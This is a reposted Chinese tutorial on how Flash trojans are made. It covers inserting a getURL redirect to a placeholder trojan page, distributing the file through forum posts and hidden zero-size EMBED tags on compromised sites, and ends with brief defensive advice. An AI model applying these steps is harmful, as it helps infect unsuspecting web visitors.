註:以下文章非本人撰寫為中國大陸網路轉載文章。
來源:賽迪網技術社區 Flash木馬是這樣練成的
作者:lvvl
在網站上觀看Flash動畫,接收到“好友”發來的一張Flash賀卡,甚至於一個即時通訊的魔法表情,一不留神就中了一個木馬!Flash動畫木馬可以說是無處不在,攻擊威力和覆蓋面極其廣。許多朋友一定想了解Flash木馬的原理,想知道攻擊者是如何在SWF中插入木馬的呢?我們應該怎麼樣來防範Flash木馬呢?
##CONTINUE##
一、製作Flash動畫木馬的準備
Flash動畫木馬的原理,是在網頁中顯示或本地直接播放Flash動畫木馬時,讓Flash自動打開一個網址,而該網址就是我們預先製作好的一個木馬網頁。也就是說,在製作網頁木馬前,我們首先需要製作好一個網頁木馬,並將它放置到某個網站上去。另外,我們還需要準備一個比較吸引人的Flash動畫文件“MM熱舞.swf”,以及Flash動畫反編譯工具“閃客精靈”,編輯工具Macromedia Flash MX。
二、最原始的Flash木馬
現在雖然有了許多各種各樣的Flash動畫木馬製作工具,但是為了了解Flash動畫木馬的最基本原理,有必要從頭開始用最原始的方法製作一個Flash木馬。
步驟一:反編譯SWF動畫
首先我們需要將要插入網頁木馬的Flash動畫文件“MM熱舞.swf”,反編譯成可編輯的.fla格式。運行“閃客精靈”,點擊功能表“文件”→“快速打開”命令,指定“MM熱舞.swf”文件將其導入。然後點擊工具欄上的“導出FLA”命令,將動畫導出為“MM熱舞.fla”文件。
步驟二:插入網頁木馬代碼
然後運行Flash動畫編輯器Macromedia Flash MX,點擊功能表“文件”→“打開”,調入剛才保存的fla文件。展開介面下方的“動作/幀”欄,再展開“動作”→“瀏覽器/網路”項,點擊其中的“getURL”命令,在右邊窗口中的“URL”裏面輸入我們的網頁木馬地址;窗口方式為“_blank”;“變數”設置為“使用GET方式發送”,在下方的代碼窗口中將出現“getURL("http://網頁木馬地址", "_blank", "GET");”。
步驟三:生成Flash木馬
設置完畢後保存文件,並點擊功能表“文件”→“發佈”命令,將動畫重新導出為SWF格式。用IE瀏覽器打開剛才生成的Flash動畫木馬,可以看到隨著Flash動畫打開播放時,自動彈出一個瀏覽器窗口,裏面將會顯示我們的木馬網頁。
三、簡簡單單生成Flash木馬
上面插入木馬的過程比較麻煩,下面我們介紹一個簡單的方法,也正是這些簡單的工具使得Flash木馬在網上隨處可見。
運行SWF木馬插入器,點擊介面中的“選擇”按鈕,瀏覽指定要插入木馬的SWF文件;在“插入代碼”中輸入木馬網頁的地址;切記不要勾選下面的“只解壓”項。設置完畢後,點擊“給我插”按鈕,程式提示開始插入木馬網頁。顯示成功資訊後,關閉程式,用IE打開生成的動畫,可以看到自動跳轉到木馬網頁去了。
四、Flash木馬的利用
看到上面的步驟了吧,生成一個Flash動畫木馬是不是很簡單?那麼生成的Flash木馬該如何應用呢?
只要我們將Flash上傳到某個網站中,就可以通過論壇或網站之類的直接利用了。
應用一:大部分的論壇中都可以發來Flash動畫的帖子,利用論壇發帖,攻擊者可以快速獲得大量的肉雞。以PHPWind v4.3.2 論壇為例,在發帖或回復時,點擊編輯窗口上方的“插入Flash動畫”按鈕,設置Flash窗口大小,使用默認設置後,要求輸入Flash的URL地址。確定後,可以看到編輯窗口中顯示的代碼為““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,這就是完整的Flash播放代碼了,不同的論壇代碼是不一樣的。
應用二:網頁嵌入Flash木馬
攻擊者入侵了某個大的網站之後,很可能在網站首頁挂馬,使用普通方式挂馬會被管理員發覺,但是挂上Flash木馬的話,是很難查殺的。攻擊者可能在網頁中插入如下代碼:
<EMBED src=http://網頁木馬地址/木馬.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false">。
這裡的參數“width=0 height=0”表示,Flash播放窗口為零,也就是不顯示Flash播放窗口。其他用戶瀏覽網頁時,就會莫名其妙的彈出一個木馬網頁窗口。
五、關於Flash木馬的防範
其實不管Flash木馬有多麼的巧妙,最終都是要跳轉到木馬網頁去的,也就是說我們最終要防範的還是網頁木馬。了解了思路,對於Flash動畫木馬就簡單了:
首先,要開啟Windows XP SP2的窗口攔截窗口功能,或安裝其他防彈出窗口的插件。如果那個漏網之魚,莫名其妙彈出的網頁窗口要及時的關閉。另外,一定要在上網瀏覽時開啟殺毒軟體的網頁監控功能,只要網頁木馬在後臺一下載到本地硬盤,就會被殺毒軟體查殺,這樣就萬事無憂了!
註:本文中對代碼(程式碼)做了一些處理,避免有樣學樣,但仍道出一個事實是製作一個[ FLASH 木馬 ] 並沒有想像中的困難。而這樣的攻擊手法則越來越常見,故發佈文章防範。
資料來源:
賽迪網技術社區 Flash木馬是這樣練成的
